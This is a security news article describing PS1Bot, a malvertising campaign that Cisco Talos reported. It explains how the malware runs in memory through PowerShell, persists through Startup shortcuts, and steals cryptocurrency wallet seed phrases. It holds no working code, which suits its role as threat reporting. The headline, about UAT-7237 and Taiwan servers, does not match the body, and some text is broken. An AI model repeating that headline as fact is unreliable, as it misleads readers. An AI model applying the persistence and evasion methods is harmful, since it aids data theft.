Taiwan Servers Compromised by UAT-7237 Using Advanced Custom Tools
A newly identified and sophisticated malware campaign is targeting Windows systems through a multi-stage attack framework named PS1Bot. This framework combines PowerShell and C# modules to execute extensive data theft operations while avoiding conventional detection methods.
The PS1Bot malware represents an advanced shift in cyberattack tactics, using a modular structure and in-memory execution to bypass antivirus tools, maintain long-term access, and minimize traces on infected systems.
Malvertising as the Initial Entry Point
PS1Bot infections are spread through malicious advertising campaigns. Victims are lured into downloading compressed archives with names crafted for search engine optimization, such as:
chapter 8 medicare benefit policy manual.zip
Counting Canadian Money Worksheets Pdf.zip.e49Inside these files is a JavaScript downloader named FULL DOCUMENT.js, which launches the infection chain by fetching more malicious components from attacker-controlled servers.
Modular Capabilities for On-Demand Attacks
The malware’s modular design allows threat actors to deploy specific tools when needed, including:
- Information stealers
- Keyloggers
- Screen capture utilities
- Persistence mechanisms
Cisco Talos reports that PS1Bot activity has been ongoing throughout 2025, with fresh samples emerging regularly, signaling active development and refinement.
Stealth Through In-Memory Execution
Unlike traditional malware, PS1Bot avoids leaving a significant footprint on disk. It uses PowerShell’s Invoke-Expression (IEX) to execute malicious code directly in memory, making detection by signature-based security solutions far less likely.
Persistence and Evasion Strategy
PS1Bot’s persistence method involves creating randomly named PowerShell scripts inside the %PROGRAMDATA% directory, paired with malicious shortcut (.LNK) files placed in the Windows Startup folder. These shortcuts automatically trigger the malware after each system reboot.
The persistence module downloads obfuscated payloads from the C2 server’s /transform endpoint. The payload is then decoded, saved as a .ps1 script, and executed — repeating the same communication and infection process indefinitely.
The malware creates unique communication URLs using the C: drive’s serial number, enabling tailored tracking of each infected system while concealing operations.
Targeting Cryptocurrency Assets
PS1Bot’s data theft functionality includes scanning for cryptocurrency wallets. It searches the system for recovery phrases, password files, and documents containing seed words in multiple languages. These are then compressed and sent to the attacker’s infrastructure via HTTP POST requests.
image import
Researchers from Cisco Talos also discovered code similarities between PS1Bot and other malware families, such as AHK Bot and tools used in Skitnet campaigns, suggesting possible shared development resources or collaboration among threat actors.
